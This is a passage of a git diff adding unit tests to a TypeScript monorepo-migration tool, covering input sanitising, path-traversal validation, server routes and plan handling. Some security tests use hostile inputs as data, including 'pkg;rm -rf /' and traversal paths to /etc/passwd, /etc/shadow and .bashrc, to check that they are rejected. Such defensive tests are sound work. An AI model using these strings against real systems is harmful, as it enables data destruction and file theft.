expect(isValidPackageName('MyPackage')).toBe(false); + expect(isValidPackageName('ALLCAPS')).toBe(false); + }); + + it('should accept valid scoped package names', () => { + expect(isValidPackageName('@scope/pkg')).toBe(true); + expect(isValidPackageName('@my-org/my-pkg')).toBe(true); + }); + + it('should accept valid simple package names', () => { + expect(isValidPackageName('my-package')).toBe(true); + expect(isValidPackageName('pkg123')).toBe(true); + expect(isValidPackageName('my.pkg')).toBe(true); + }); +}); + +describe('sanitizePackageName – produces safe output', () => { + it('should lowercase all characters', () => { + expect(sanitizePackageName('MyPackage')).toBe('mypackage'); + expect(sanitizePackageName('UPPER')).toBe('upper'); + }); + + it('should replace invalid characters with dashes', () => { + expect(sanitizePackageName('pkg name')).toBe('pkg-name'); + expect(sanitizePackageName('pkg@evil')).toBe('pkg-evil'); + expect(sanitizePackageName('pkg;rm')).toBe('pkg-rm'); + }); + + it('should strip leading/trailing dots and dashes', () => { + expect(sanitizePackageName('.evil')).toBe('evil'); + expect(sanitizePackageName('-evil')).toBe('evil'); + expect(sanitizePackageName('...hidden')).toBe('hidden'); + }); + + it('should truncate to 214 characters', () => { + const longInput = 'a'.repeat(300); + expect(sanitizePackageName(longInput).length).toBeLessThanOrEqual(214); + }); + + it('should neutralize path traversal in names', () => { + const result = sanitizePackageName('../../../etc/passwd'); + expect(result).not.toContain('..'); + expect(result).not.toContain('/'); + }); + + it('should neutralize shell metacharacters in names', () => { + const result = sanitizePackageName('pkg;rm -rf /'); + expect(result).not.toContain(';'); + expect(result).not.toContain(' '); + }); + + it('should handle empty string', () => { + const result = sanitizePackageName(''); + expect(result).toBe(''); + }); +}); + +describe('parseRepoSource – safe source parsing', () => { + it('should classify local paths correctly', () => { + const localInput = '/tmp/my-repo'; + const source = parseRepoSource(localInput); + expect(source.type).toBe('local'); + expect(source.resolved).toBe(path.resolve(localInput)); + }); + + it('should classify relative paths as local', () => { + const source = parseRepoSource('./my-repo'); + expect(source.type).toBe('local'); + }); + + it('should classify parent-relative paths as local', () => { + const source = parseRepoSource('../my-repo'); + expect(source.type).toBe('local'); + }); + + it('should classify GitHub shorthands correctly', () => { + const source = parseRepoSource('owner/repo'); + expect(source.type).toBe('github'); + expect(source.resolved).toBe('https://github.com/owner/repo.git'); + }); + + it('should classify GitLab shorthands correctly', () => { + const source = parseRepoSource('gitlab:owner/repo'); + expect(source.type).toBe('gitlab'); + expect(source.resolved).toBe('https://gitlab.com/owner/repo.git'); + }); + + it('should extract repo name from HTTPS URLs', () => { + const source = parseRepoSource('https://github.com/org/my-repo.git'); + expect(source.name).toBe('my-repo'); + }); + + it('should extract repo name from SSH URLs', () => { + const source = parseRepoSource('git@github.com:org/my-repo.git'); + expect(source.name).toBe('my-repo'); + }); + + it('should trim whitespace from input', () => { + const source = parseRepoSource(' /tmp/my-repo '); + expect(source.original).toBe('/tmp/my-repo'); + }); + + it('should handle input with special characters in path', () => { + const source = parseRepoSource('/tmp/my repo with spaces'); + expect(source.type).toBe('local'); + expect(source.name).toBe('my repo with spaces'); + }); + + it('should produce "unknown" for empty-ish input', () => { + const source = parseRepoSource(''); + expect(source.name).toBe('unknown'); + }); +}); + +describe('URL handling – no credential inclusion', () => { + it('should not embed credentials in resolved GitHub URLs', () => { + const source = parseRepoSource('owner/repo'); + expect(source.resolved).not.toContain('@'); + expect(source.resolved).not.toContain('token'); + expect(source.resolved).toBe('https://github.com/owner/repo.git'); + }); + + it('should not embed credentials in resolved GitLab URLs', () => { + const source = parseRepoSource('gitlab:owner/repo'); + expect(source.resolved).not.toMatch(/\/\/[^/]*@/); + expect(source.resolved).toBe('https://gitlab.com/owner/repo.git'); + }); +}); diff --git a/tests/unit/security/path-traversal.test.ts b/tests/unit/security/path-traversal.test.ts new file mode 100644 index 0000000..e075048 --- /dev/null +++ b/tests/unit/security/path-traversal.test.ts @@ -0,0 +1,203 @@ +import { describe, it, expect } from 'vitest'; +import path from 'node:path'; +import { validatePlan } from '../../../src/commands/apply.js'; + +/** + * Path traversal security tests. + * + * These verify that the application rejects attempts to escape + * the output directory via ".." sequences, absolute paths, or + * encoded variants in both plan validation and runtime assertions. + */ + +// Re-implement assertPathContained locally so we can test it directly. +// (The real one is a private function in apply.ts — we test it +// indirectly via validatePlan and directly via this equivalent.) +function assertPathContained(base: string, relativePath: string): void { + const resolved = path.resolve(base, relativePath); + const normalizedBase = path.resolve(base) + path.sep; + if (!resolved.startsWith(normalizedBase) && resolved !== path.resolve(base)) { + throw new Error(`Path traversal detected: "${relativePath}" escapes base directory`); + } +} + +describe('assertPathContained – path traversal prevention', () => { + const base = '/tmp/monorepo-output'; + + it('should allow normal relative paths', () => { + expect(() => assertPathContained(base, 'packages/my-pkg')).not.toThrow(); + expect(() => assertPathContained(base, 'package.json')).not.toThrow(); + expect(() => assertPathContained(base, 'pnpm-workspace.yaml')).not.toThrow(); + expect(() => assertPathContained(base, '.gitignore')).not.toThrow(); + }); + + it('should reject simple "../" traversal', () => { + expect(() => assertPathContained(base, '../etc/passwd')).toThrow('Path traversal detected'); + }); + + it('should reject nested "../" traversal', () => { + expect(() => assertPathContained(base, '../../etc/shadow')).toThrow('Path traversal detected'); + }); + + it('should reject traversal hidden in a deeper path', () => { + expect(() => assertPathContained(base, 'packages/../../etc/passwd')).toThrow('Path traversal detected'); + }); + + it('should reject traversal that goes up and back down', () => { + // Goes up to /tmp then into "other" — outside our base + expect(() => assertPathContained(base, '../other/evil')).toThrow('Path traversal detected'); + }); + + it('should reject absolute paths', () => { + expect(() => assertPathContained(base, '/etc/passwd')).toThrow('Path traversal detected'); + }); + + it('should allow paths with ".." that resolve inside base', () => { + // packages/a/../b resolves to packages/b which is still inside base + expect(() => assertPathContained(base, 'packages/a/../b')).not.toThrow(); + }); +}); + +describe('validatePlan – rejects path traversal in packagesDir', () => { + function makePlan(overrides: Record = {}) { + return { + version: 1, + sources: [{ name: 'pkg', path: '/tmp/src/pkg' }], + packagesDir: 'packages', + rootPackageJson: { name: 'mono', private: true }, + files: [], + install: false, + ...overrides, + }; + } + + it('should accept normal packagesDir', () => { + expect(validatePlan(makePlan({ packagesDir: 'packages' }))).toBe(true); + expect(validatePlan(makePlan({ packagesDir: 'libs' }))).toBe(true); + expect(validatePlan(makePlan({ packagesDir: 'apps' }))).toBe(true); + }); + + it('should reject packagesDir with ".."', () => { + expect(validatePlan(makePlan({ packagesDir: '../outside' }))).toBe(false); + expect(validatePlan(makePlan({ packagesDir: 'packages/../../etc' }))).toBe(false); + }); + + it('should reject absolute packagesDir', () => { + expect(validatePlan(makePlan({ packagesDir: '/etc' }))).toBe(false); + expect(validatePlan(makePlan({ packagesDir: '/tmp/evil' }))).toBe(false); + }); +}); + +describe('validatePlan – rejects path traversal in file relativePaths', () => { + function makePlanWithFile(relativePath: string) { + return { + version: 1, + sources: [{ name: 'pkg', path: '/tmp/src/pkg' }], + packagesDir: 'packages', + rootPackageJson: { name: 'mono', private: true }, + files: [{ relativePath, content: 'evil' }], + install: false, + }; + } + + it('should accept normal file paths', () => { + expect(validatePlan(makePlanWithFile('pnpm-workspace.yaml'))).toBe(true); + expect(validatePlan(makePlanWithFile('.gitignore'))).toBe(true); + expect(validatePlan(makePlanWithFile('README.md'))).toBe(true); + expect(validatePlan(makePlanWithFile('.github/workflows/ci.yml'))).toBe(true); + }); + + it('should reject file paths with ".."', () => { + expect(validatePlan(makePlanWithFile('../.bashrc'))).toBe(false); + expect(validatePlan(makePlanWithFile('../../etc/passwd'))).toBe(false); + expect(validatePlan(makePlanWithFile('packages/../../evil.js'))).toBe(false); + }); + + it('should reject absolute file paths', () => { + expect(validatePlan(makePlanWithFile('/etc/passwd'))).toBe(false); + expect(validatePlan(makePlanWithFile('/tmp/evil'))).toBe(false); + }); + + it('should reject file paths among valid ones', () => { + const plan = { + version: 1, + sources: [{ name: 'pkg', path: '/tmp/src/pkg' }], + packagesDir: 'packages', + rootPackageJson: { name: 'mono', private: true }, + files: [ + { relativePath: 'pnpm-workspace.yaml', content: 'ok' }, + { relativePath: '../.bashrc', content: 'evil' }, + ], + install: false, + }; + expect(validatePlan(plan)).toBe(false); + }); +}); + +describe('validatePlan – rejects malformed plans', () => { + it('should reject null', () => { + expect(validatePlan(null)).toBe(false); + }); + + it('should reject non-object', () => { + expect(validatePlan('string')).toBe(false); + expect(validatePlan(42)).toBe(false); + expect(validatePlan(true)).toBe(false); + }); + + it('should reject wrong version', () => { + expect(validatePlan({ version: 2 })).toBe(false); + expect(validatePlan({ version: 0 })).toBe(false); + }); + + it('should reject empty sources', () => { + expect(validatePlan({ + version: 1, + sources: [], + packagesDir: 'packages', + rootPackageJson: {}, + files: [], + install: false, + })).toBe(false); + }); + + it('should reject sources with missing name or path', () => { + expect(validatePlan({ + version: 1, + sources: [{ name: 'pkg' }], // missing path + packagesDir: 'packages', + rootPackageJson: {}, + files: [], + install: false, + })).toBe(false); + + expect(validatePlan({ + version: 1, + sources: [{ path: '/tmp/pkg' }], // missing name + packagesDir: 'packages', + rootPackageJson: {}, + files: [], + install: false, + })).toBe(false); + }); + + it('should reject files with missing relativePath or content', () => { + expect(validatePlan({ + version: 1, + sources: [{ name: 'pkg', path: '/tmp/pkg' }], + packagesDir: 'packages', + rootPackageJson: {}, + files: [{ content: 'ok' }], // missing relativePath + install: false, + })).toBe(false); + + expect(validatePlan({ + version: 1, + sources: [{ name: 'pkg', path: '/tmp/pkg' }], + packagesDir: 'packages', + rootPackageJson: {}, + files: [{ relativePath: 'README.md' }], // missing content + install: false, + })).toBe(false); + }); +}); diff --git a/tests/unit/server/api.test.ts b/tests/unit/server/api.test.ts index b76b540..835f86d 100755 --- a/tests/unit/server/api.test.ts +++ b/tests/unit/server/api.test.ts @@ -1,7 +1,9 @@ import { describe, it, expect, afterEach } from 'vitest'; import path from 'node:path'; import fs from 'fs-extra'; -import { runAnalyze, runPlan, runVerify } from '../../../src/server/api.js'; +import os from 'node:os'; +import crypto from 'node:crypto'; +import { runAnalyze, runPlan, runVerify, runApply } from '../../../src/server/api.js'; import type { Logger } from '../../../src/types/index.js'; const fixturesDir = path.resolve(__dirname, '../../fixtures'); @@ -79,6 +81,47 @@ describe('runPlan', () => { }, 30000); }); +describe('runPlan - workspace tool', () => { + it('generates plan with turbo workspace tool', async () => { + const logger = createTestLogger(); + const repoA = path.join(fixturesDir, 'repo-a'); + const repoB = path.join(fixturesDir, 'repo-b'); + + const result = await runPlan( + [repoA, repoB], + { workspaceTool: 'turbo' }, + logger, + ); + createdFiles.push(result.planPath); + + expect(result.plan.rootPackageJson.devDependencies).toBeDefined(); + const devDeps = result.plan.rootPackageJson.devDependencies as Record; + expect(devDeps.turbo).toBeDefined(); + + // Should have turbo.json file in plan + const turboFile = result.plan.files.find((f) => f.relativePath === 'turbo.json'); + expect(turboFile).toBeDefined(); + }, 30000); + + it('generates plan with workflow skip strategy', async () => { + const logger = createTestLogger(); + const repoA = path.join(fixturesDir, 'repo-a'); + + const result = await runPlan( + [repoA], + { workflowStrategy: 'skip' }, + logger, + ); + createdFiles.push(result.planPath); + + // With skip, no workflow files should be generated + const workflowFiles = result.plan.files.filter((f) => + f.relativePath.includes('.github/workflows'), + ); + expect(workflowFiles).toHaveLength(0); + }, 30000); +}); + describe('runVerify', () => { it('returns VerifyResult for plan file', async () => { const logger = createTestLogger(); @@ -113,4 +156,177 @@ describe('runVerify', () => { 'Specify either plan or dir, not both', ); }); + + it('throws for non-existent plan file', async () => { + const logger = createTestLogger(); + await expect( + runVerify({ plan: '/nonexistent/plan.json' }, logger), + ).rejects.toThrow('Plan file not found'); + }); + + it('throws for invalid plan file content', async () => { + const tempDir = path.join(os.tmpdir(), `verify-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + const planPath = path.join(tempDir, 'bad-plan.json'); + await fs.writeJson(planPath, { not: 'a valid plan' }); + + const logger = createTestLogger(); + try { + await expect( + runVerify({ plan: planPath }, logger), + ).rejects.toThrow('Invalid plan file'); + } finally { + await fs.remove(tempDir); + } + }); + + it('throws for non-existent dir', async () => { + const logger = createTestLogger(); + await expect( + runVerify({ dir: '/nonexistent/monorepo' }, logger), + ).rejects.toThrow('Directory not found'); + }); + + it('throws for dir without package.json', async () => { + const tempDir = path.join(os.tmpdir(), `verify-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + + const logger = createTestLogger(); + try { + await expect( + runVerify({ dir: tempDir }, logger), + ).rejects.toThrow('No package.json found'); + } finally { + await fs.remove(tempDir); + } + }); + + it('runs static tier on a valid directory', async () => { + const tempDir = path.join(os.tmpdir(), `verify-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + await fs.writeJson(path.join(tempDir, 'package.json'), { + name: 'test-monorepo', + version: '1.0.0', + workspaces: ['packages/*'], + }); + + const logger = createTestLogger(); + try { + const result = await runVerify({ dir: tempDir, tier: 'static' }, logger); + expect(result.tier).toBe('static'); + expect(result.inputType).toBe('dir'); + expect(result.checks.length).toBeGreaterThan(0); + } finally { + await fs.remove(tempDir); + } + }); + + it('runs install tier on a valid directory', async () => { + const tempDir = path.join(os.tmpdir(), `verify-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + await fs.writeJson(path.join(tempDir, 'package.json'), { + name: 'test-monorepo', + version: '1.0.0', + workspaces: ['packages/*'], + }); + + const logger = createTestLogger(); + try { + const result = await runVerify({ dir: tempDir, tier: 'install' }, logger); + expect(result.tier).toBe('install'); + // Install tier includes static + install checks + expect(result.checks.length).toBeGreaterThan(0); + } finally { + await fs.remove(tempDir); + } + }, 30000); + + it('runs full tier on a valid directory', async () => { + const tempDir = path.join(os.tmpdir(), `verify-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + await fs.writeJson(path.join(tempDir, 'package.json'), { + name: 'test-monorepo', + version: '1.0.0', + workspaces: ['packages/*'], + }); + + const logger = createTestLogger(); + try { + const result = await runVerify({ dir: tempDir, tier: 'full' }, logger); + expect(result.tier).toBe('full'); + // Full tier includes static + install + full checks + expect(result.checks.length).toBeGreaterThan(0); + } finally { + await fs.remove(tempDir); + } + }, 30000); +}); + +describe('runApply', () => { + it('throws for non-existent plan file', async () => { + const logger = createTestLogger(); + await expect( + runApply({ plan: '/nonexistent/plan.json' }, logger), + ).rejects.toThrow('Plan file not found'); + }); + + it('throws for invalid JSON plan file', async () => { + const tempDir = path.join(os.tmpdir(), `apply-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + const planPath = path.join(tempDir, 'bad.plan.json'); + await fs.writeFile(planPath, 'not json at all{{{'); + + const logger = createTestLogger(); + try { + await expect( + runApply({ plan: planPath }, logger), + ).rejects.toThrow('Plan file contains invalid JSON'); + } finally { + await fs.remove(tempDir); + } + }); + + it('throws for structurally invalid plan', async () => { + const tempDir = path.join(os.tmpdir(), `apply-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + const planPath = path.join(tempDir, 'invalid.plan.json'); + await fs.writeJson(planPath, { version: 1, sources: 'not an array' }); + + const logger = createTestLogger(); + try { + await expect( + runApply({ plan: planPath }, logger), + ).rejects.toThrow('Plan file is invalid'); + } finally { + await fs.remove(tempDir); + } + }); + + it('throws when source path does not exist', async () => { + const tempDir = path.join(os.tmpdir(), `apply-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + const planPath = path.join(tempDir, 'test.plan.json'); + await fs.writeJson(planPath, { + version: 1, + sources: [{ name: 'missing-pkg', path: '/nonexistent/source/path' }], + packagesDir: 'packages', + rootPackageJson: { name: 'test', version: '1.0.0' }, + files: [], + install: false, + installCommand: 'pnpm install', + }); + + const logger = createTestLogger(); + try { + await expect( + runApply({ plan: planPath, out: path.join(tempDir, 'output') }, logger), + ).rejects.toThrow('Source path not found'); + } finally { + // Cleanup staging dirs too + const dirContents = await fs.readdir(tempDir); + for (const item of dirContents) { + await fs.remove(path.join(tempDir, item)).catch(() => {}); + } + } + }); }); diff --git a/tests/unit/server/routes.test.ts b/tests/unit/server/routes.test.ts new file mode 100644 index 0000000..46a1677 --- /dev/null +++ b/tests/unit/server/routes.test.ts @@ -0,0 +1,139 @@ +import { describe, it, expect, beforeAll, afterAll } from 'vitest'; +import http from 'node:http'; +import request from 'supertest'; +import { createServer } from '../../../src/server/index.js'; + +describe('server routes - add and migrate-branch', () => { + let server: http.Server; + let authToken: string; + + function authPost(path: string) { + return request(server).post(path).set('Authorization', `Bearer ${authToken}`); + } + + beforeAll(async () => { + const result = createServer({ port: 0 }); + server = result.server; + authToken = result.token; + await new Promise((resolve) => { + server.on('listening', resolve); + }); + }); + + afterAll(async () => { + await new Promise((resolve) => { + server.close(() => resolve()); + }); + }); + + describe('POST /api/add', () => { + it('should return 400 when repo is missing', async () => { + const res = await authPost('/api/add').send({}); + expect(res.status).toBe(400); + expect(res.body.error).toContain('repo'); + }); + + it('should return 400 when repo is not a string', async () => { + const res = await authPost('/api/add').send({ repo: 123 }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('repo'); + }); + + it('should return 400 when targetMonorepo is missing', async () => { + const res = await authPost('/api/add').send({ repo: 'org/my-lib' }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('targetMonorepo'); + }); + + it('should return 400 when targetMonorepo is not a string', async () => { + const res = await authPost('/api/add').send({ repo: 'org/my-lib', targetMonorepo: 42 }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('targetMonorepo'); + }); + + it('should return 202 with opId for valid request', async () => { + const res = await authPost('/api/add').send({ + repo: 'tests/fixtures/repo-a', + targetMonorepo: '/tmp/nonexistent-mono', + }); + expect(res.status).toBe(202); + expect(res.body.opId).toBeDefined(); + expect(typeof res.body.opId).toBe('string'); + }); + }); + + describe('POST /api/migrate-branch', () => { + it('should return 400 when branch is missing', async () => { + const res = await authPost('/api/migrate-branch').send({}); + expect(res.status).toBe(400); + expect(res.body.error).toContain('branch'); + }); + + it('should return 400 when branch is not a string', async () => { + const res = await authPost('/api/migrate-branch').send({ branch: 123 }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('branch'); + }); + + it('should return 400 when sourceRepo is missing', async () => { + const res = await authPost('/api/migrate-branch').send({ branch: 'main' }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('sourceRepo'); + }); + + it('should return 400 when sourceRepo is not a string', async () => { + const res = await authPost('/api/migrate-branch').send({ branch: 'main', sourceRepo: 42 }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('sourceRepo'); + }); + + it('should return 400 when targetMonorepo is missing', async () => { + const res = await authPost('/api/migrate-branch').send({ + branch: 'main', + sourceRepo: '/tmp/src', + }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('targetMonorepo'); + }); + + it('should return 400 when targetMonorepo is not a string', async () => { + const res = await authPost('/api/migrate-branch').send({ + branch: 'main', + sourceRepo: '/tmp/src', + targetMonorepo: false, + }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('targetMonorepo'); + }); + + it('should return 202 with opId for valid request', async () => { + const res = await authPost('/api/migrate-branch').send({ + branch: 'main', + sourceRepo: '/tmp/src', + targetMonorepo: '/tmp/target', + }); + expect(res.status).toBe(202); + expect(res.body.opId).toBeDefined(); + expect(typeof res.body.opId).toBe('string'); + }); + + it('should default to subtree strategy', async () => { + const res = await authPost('/api/migrate-branch').send({ + branch: 'main', + sourceRepo: '/tmp/src', + targetMonorepo: '/tmp/target', + }); + expect(res.status).toBe(202); + }); + + it('should accept replay strategy', async () => { + const res = await authPost('/api/migrate-branch').send({ + branch: 'feature', + sourceRepo: '/tmp/src', + targetMonorepo: '/tmp/target', + strategy: 'replay', + }); + expect(res.status).toBe(202); + }); + }); +}); diff --git a/tests/unit/server/wizard-routes-errors.test.ts b/tests/unit/server/wizard-routes-errors.test.ts new file mode 100644 index 0000000..f49b51c --- /dev/null +++ b/tests/unit/server/wizard-routes-errors.test.ts @@ -0,0 +1,126 @@ +import { describe, it, expect, vi, beforeAll, afterAll } from 'vitest'; +import express from 'express'; +import http from 'node:http'; +import request from 'supertest'; + +vi.mock('../../../src/server/wizard-state.js', () => ({ + readWizardState: vi.fn(), + writeWizardState: vi.fn(), + createDefaultWizardState: vi.fn(), +})); + +import { wizardRoute } from '../../../src/server/routes/wizard.js'; +import { + readWizardState, + writeWizardState, + createDefaultWizardState, +} from '../../../src/server/wizard-state.js'; + +const mockRead = vi.mocked(readWizardState); +const mockWrite = vi.mocked(writeWizardState); +const mockCreate = vi.mocked(createDefaultWizardState); + +describe('wizard routes error handling', () => { + let app: express.Express; + let server: http.Server; + + beforeAll(async () => { + app = express(); + app.use(express.json()); + app.use('/api/wizard', wizardRoute()); + server = http.createServer(app); + await new Promise((resolve) => { + server.listen(0, '127.0.0.1', resolve); + }); + }); + + afterAll(async () => { + await new Promise((resolve) => { + server.close(() => resolve()); + }); + }); + + describe('GET /api/wizard/state error path', () => { + it('should return 500 when readWizardState throws an Error', async () => { + mockRead.mockRejectedValueOnce(new Error('disk read failure')); + + const res = await request(server).get('/api/wizard/state'); + + expect(res.status).toBe(500); + expect(res.body.error).toBe('disk read failure'); + }); + + it('should return 500 with fallback message for non-Error throw', async () => { + mockRead.mockRejectedValueOnce('string error'); + + const res = await request(server).get('/api/wizard/state'); + + expect(res.status).toBe(500); + expect(res.body.error).toBe('Failed to read wizard state'); + }); + }); + + describe('PUT /api/wizard/state error path', () => { + it('should return 500 when writeWizardState throws an Error', async () => { + mockWrite.mockRejectedValueOnce(new Error('disk write failure')); + + const res = await request(server) + .put('/api/wizard/state') + .send({ version: 1, currentStep: 0 }); + + expect(res.status).toBe(500); + expect(res.body.error).toBe('disk write failure'); + }); + + it('should return 500 with fallback message for non-Error throw', async () => { + mockWrite.mockRejectedValueOnce(42); + + const res = await request(server) + .put('/api/wizard/state') + .send({ version: 1, currentStep: 0 }); + + expect(res.status).toBe(500); + expect(res.body.error).toBe('Failed to write wizard state'); + }); + }); + + describe('POST /api/wizard/init error path', () => { + it('should return 500 when createDefaultWizardState throws an Error', async () => { + mockCreate.mockImplementationOnce(() => { + throw new Error('creation failure'); + }); + + const res = await request(server) + .post('/api/wizard/init') + .send({ repos: ['/tmp/test'] }); + + expect(res.status).toBe(500); + expect(res.body.error).toBe('creation failure'); + }); + + it('should return 500 when writeWizardState rejects after init', async () => { + mockCreate.mockReturnValueOnce({ version: 1, currentStep: 'assess' } as ReturnType); + mockWrite.mockRejectedValueOnce(new Error('write after init failed')); + + const res = await request(server) + .post('/api/wizard/init') + .send({ repos: ['/tmp/test'] }); + + expect(res.status).toBe(500); + expect(res.body.error).toBe('write after init failed'); + }); + + it('should return 500 with fallback for non-Error throw in init', async () => { + mockCreate.mockImplementationOnce(() => { + throw 'unexpected'; + }); + + const res = await request(server) + .post('/api/wizard/init') + .send({ repos: ['/tmp/test'] }); + + expect(res.status).toBe(500); + expect(res.body.error).toBe('Failed to initialize wizard state'); + }); + }); +}); diff --git a/tests/unit/server/wizard-routes.test.ts b/tests/unit/server/wizard-routes.test.ts new file mode 100644 index 0000000..fa7d2a3 --- /dev/null +++ b/tests/unit/server/wizard-routes.test.ts @@ -0,0 +1,112 @@ +import { describe, it, expect, beforeAll, afterAll } from 'vitest'; +import http from 'node:http'; +import request from 'supertest'; +import { createServer } from '../../../src/server/index.js'; + +describe('wizard routes', () => { + let server: http.Server; + let authToken: string; + + beforeAll(async () => { + const result = createServer({ port: 0 }); + server = result.server; + authToken = result.token; + await new Promise((resolve) => { + server.on('listening', resolve); + }); + }); + + afterAll(async () => { + await new Promise((resolve) => { + server.close(() => resolve()); + }); + }); + + function authGet(urlPath: string) { + return request(server).get(urlPath).set('Authorization', `Bearer ${authToken}`); + } + + function authPut(urlPath: string) { + return request(server).put(urlPath).set('Authorization', `Bearer ${authToken}`); + } + + function authPost(urlPath: string) { + return request(server).post(urlPath).set('Authorization', `Bearer ${authToken}`); + } + + describe('GET /api/wizard/state', () => { + it('should return state object with exists field', async () => { + const res = await authGet('/api/wizard/state'); + expect(res.status).toBe(200); + expect(res.body).toHaveProperty('exists'); + expect(typeof res.body.exists).toBe('boolean'); + }); + }); + + describe('PUT /api/wizard/state', () => { + it('should reject state without version', async () => { + const res = await authPut('/api/wizard/state').send({ step: 1 }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('version'); + }); + + it('should reject non-object body', async () => { + const res = await authPut('/api/wizard/state').send('not-json'); + expect(res.status).toBe(400); + }); + + it('should accept valid wizard state', async () => { + const state = { + version: 1, + currentStep: 0, + repos: ['/tmp/repo-a'], + completedSteps: [], + }; + const res = await authPut('/api/wizard/state').send(state); + expect(res.status).toBe(200); + expect(res.body.ok).toBe(true); + }); + + it('should persist state that can be read back', async () => { + const state = { + version: 1, + currentStep: 2, + repos: ['/tmp/test-repo'], + completedSteps: [0, 1], + }; + await authPut('/api/wizard/state').send(state); + + const res = await authGet('/api/wizard/state'); + expect(res.status).toBe(200); + expect(res.body.exists).toBe(true); + expect(res.body.state.currentStep).toBe(2); + }); + }); + + describe('POST /api/wizard/init', () => { + it('should reject missing repos', async () => { + const res = await authPost('/api/wizard/init').send({}); + expect(res.status).toBe(400); + expect(res.body.error).toContain('repos'); + }); + + it('should reject empty repos array', async () => { + const res = await authPost('/api/wizard/init').send({ repos: [] }); + expect(res.status).toBe(400); + }); + + it('should reject non-string repos', async () => { + const res = await authPost('/api/wizard/init').send({ repos: [1, 2] }); + expect(res.status).toBe(400); + }); + + it('should create default state with provided repos', async () => { + const res = await authPost('/api/wizard/init').send({ + repos: ['/tmp/repo-a', '/tmp/repo-b'], + }); + expect(res.status).toBe(200); + expect(res.body.state).toBeDefined(); + expect(res.body.state.version).toBe(1); + }); + }); +}); diff --git a/tests/unit/server/ws-hub.test.ts b/tests/unit/server/ws-hub.test.ts index e2694e3..def3be1 100755 --- a/tests/unit/server/ws-hub.test.ts +++ b/tests/unit/server/ws-hub.test.ts @@ -119,6 +119,31 @@ describe('WsHub', () => { expect((ws as any).sent.length).toBe(0); // 0 because there were no buffered events at subscribe time }); + it('ignores malformed WebSocket messages', () => { + const ws = createMockWs(); + hub.register(ws); + + // Send a non-JSON message — should not throw + ws.emit('message', 'not json at all{{{'); + + // Send a message with missing type — should not throw + ws.emit('message', JSON.stringify({ opId: 'op1' })); + + // Hub should still function + hub.createOperation('op1'); + hub.broadcast('op1', { type: 'done', opId: 'op1' }); + expect(hub.isDone('op1')).toBe(true); + }); + + it('throws when max concurrent operations exceeded', () => { + // Create ops up to the limit (MAX_CONCURRENT = 5) + for (let i = 0; i < 5; i++) { + hub.createOperation(`op-${i}`); + } + + expect(() => hub.createOperation('op-overflow')).toThrow('Too many concurrent operations'); + }); + it('scheduleCleanup removes operation after delay', async () => { hub.createOperation('op1'); hub.broadcast('op1', { type: 'log', level: 'info', message: 'test', opId: 'op1' }); diff --git a/tests/unit/strategies/add.test.ts b/tests/unit/strategies/add.test.ts new file mode 100644 index 0000000..052aa26 --- /dev/null +++ b/tests/unit/strategies/add.test.ts @@ -0,0 +1,380 @@ +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import fs from 'fs-extra'; +import path from 'node:path'; +import os from 'node:os'; +import crypto from 'node:crypto'; +import { applyAddPlan, generateAddPlan } from '../../../src/strategies/add.js'; +import type { AddPlan, Logger } from '../../../src/types/index.js'; + +function mockLogger(): Logger { + return { + info: vi.fn(), + success: vi.fn(), + warn: vi.fn(), + error: vi.fn(), + debug: vi.fn(), + log: vi.fn(), + }; +} + +describe('add strategy', () => { + let tempDir: string; + + beforeEach(async () => { + tempDir = path.join(os.tmpdir(), `add-test-${crypto.randomBytes(8).toString('hex')}`); + await fs.ensureDir(tempDir); + }); + + afterEach(async () => { + await fs.remove(tempDir); + }); + + describe('generateAddPlan', () => { + it('should throw for invalid repo source', async () => { + const logger = mockLogger(); + await expect( + generateAddPlan( + '/completely/nonexistent/source/repo', + { to: tempDir, packagesDir: 'packages' }, + logger, + ), + ).rejects.toThrow(); + }); + + it('should throw for non-existent target monorepo', async () => { + const logger = mockLogger(); + await expect( + generateAddPlan( + path.join(__dirname, '../../../tests/fixtures/repo-a'), + { to: '/nonexistent/monorepo/path', packagesDir: 'packages' }, + logger, + ), + ).rejects.toThrow('Target monorepo does not exist'); + }); + + it('should throw for monorepo without package.json', async () => { + const monorepoDir = path.join(tempDir, 'monorepo-no-pkg'); + await fs.ensureDir(monorepoDir); + const logger = mockLogger(); + await expect( + generateAddPlan( + path.join(__dirname, '../../../tests/fixtures/repo-a'), + { to: monorepoDir, packagesDir: 'packages' }, + logger, + ), + ).rejects.toThrow('No package.json found in monorepo'); + }); + + it('should generate plan for valid monorepo with existing packages', async () => { + const monorepoDir = path.join(tempDir, 'monorepo'); + const packagesDir = path.join(monorepoDir, 'packages'); + const existingPkg = path.join(packagesDir, 'existing-pkg'); + await fs.ensureDir(existingPkg); + await fs.writeJson(path.join(monorepoDir, 'package.json'), { + name: 'monorepo', + workspaces: ['packages/*'], + }); + await fs.writeJson(path.join(existingPkg, 'package.json'), { + name: 'existing-pkg', + version: '1.0.0', + }); + + const logger = mockLogger(); + const plan = await generateAddPlan( + path.join(__dirname, '../../../tests/fixtures/repo-a'), + { to: monorepoDir, packagesDir: 'packages' }, + logger, + ); + + expect(plan.schemaVersion).toBe(1); + expect(plan.targetMonorepo).toBe(monorepoDir); + expect(plan.operations.length).toBeGreaterThanOrEqual(3); + }); + + it('should detect cross-dependencies between new and existing packages', async () => { + const monorepoDir = path.join(tempDir, 'monorepo-cross'); + const packagesDir = path.join(monorepoDir, 'packages'); + // Create an existing package named "lodash" (repo-a depends on lodash) + const existingPkg = path.join(packagesDir, 'lodash'); + await 